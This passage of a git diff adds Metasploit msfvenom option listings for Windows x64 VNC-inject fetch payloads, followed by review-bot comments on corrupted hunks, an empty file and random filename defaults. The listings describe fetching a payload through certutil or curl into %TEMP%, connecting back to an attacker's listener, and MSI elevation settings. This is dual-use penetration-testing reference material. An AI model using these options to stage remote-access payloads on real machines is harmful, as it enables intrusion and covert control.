-------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Tunnel communication over HTTP (Windows x64 wininet) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp.txt new file mode 100644 index 0000000..9e60fde --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp.txt 
@@ -0,0 +1,85 @@ + + Name: HTTP Fetch, Windows x64 Reverse TCP Stager + Module: payload/cmd/windows/http/x64/vncinject/reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME reVMhjBNTG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Connect back to the attacker (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between 
pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp_rc4.txt new file mode 100644 index 0000000..4d74211 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp_rc4.txt 
@@ -0,0 +1,91 @@ + + Name: HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/vncinject/reverse_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + sf + hdm + skape + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME owtbxYHW no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + 
PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp_uuid.txt new file mode 100644 index 0000000..e69de29
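Review bot: the header of the `cmd-windows-http-x64-vncinject-reverse_http.txt` hunk is corrupted: after `Needs Admin: No` the line reads `Total` and then jumps into `+Evasion options for payload/cmd/windows/http/x64/vncinject/reverse_http:` followed by a `=========================` rule and a truncated author entry `.com>` before `OJ Reeves`, so the `Total size:`, `Rank:` and most of the `Provided by:` block that every sibling file carries are missing. That pattern (one output section overwriting another mid-line) is what an interleaved stdout/stderr capture looks like; regenerate this file with the two streams captured in order. While regenerating, check the `HttpUnknownRequestResponse` entry in the same hunk: its default value is split across lines that carry no leading `+` (`It works!` sits alone between `HttpUnknownRequestResponse` and `no The returned HTML response body ...`), which `git apply` rejects as a corrupt hunk, and if the real default carries surrounding markup it was lost in the capture. Collapsing multi-line defaults to one line in the generator would avoid both problems.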
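Review bot: the `cmd-windows-http-x64-vncinject-reverse_https.txt` hunk has the same capture corruption as the reverse_http one: `Total s` is cut off by `+Evasion options for payload/cmd/windows/http/x64/vncinject/reverse_https:` and the author list starts with the fragment `om>` before `hdm`, so `Total size:`, `Rank:` and the first `Provided by:` entries are lost, and the `HttpUnknownRequestResponse` default is again split onto unprefixed `It works!` lines that make the hunk unapplyable. Regenerate this file together with reverse_http.txt rather than hand-patching it, since the defect is in the dump step, not in the file.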
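Review bot: the final file header in this range, `cmd-windows-http-x64-vncinject-reverse_tcp_uuid.txt`, adds an empty file: its index line is `0000000..e69de29`, where `e69de29` is git's hash of the empty blob, and no `@@` hunk follows it, whereas every sibling payload file carries a full options dump of 79 to 107 lines. The generator most likely failed or timed out for that payload; either regenerate it or leave the file out, because a blank options page next to populated ones reads as if the payload had no options.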
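Review bot: starting with the `cmd-windows-http-x64-vncinject-bind_tcp_rc4.txt` hunk and repeated in every other hunk here, the `FETCH_FILENAME` default is a fresh random string (`BJBqCfWHhBIA`, `GiDjTwViA`, `DDEePhIid`, `UdFOFThcK`, `reVMhjBNTG`, `owtbxYHW`) that msfvenom generates per invocation, so each regeneration of these dumps will produce a spurious one-line diff in every file and bury real option changes. Have the generation script normalise that field to a fixed placeholder (or strip the `Current Setting` for it) before writing the file, or at least document in the directory README that this value is random and not a committed default.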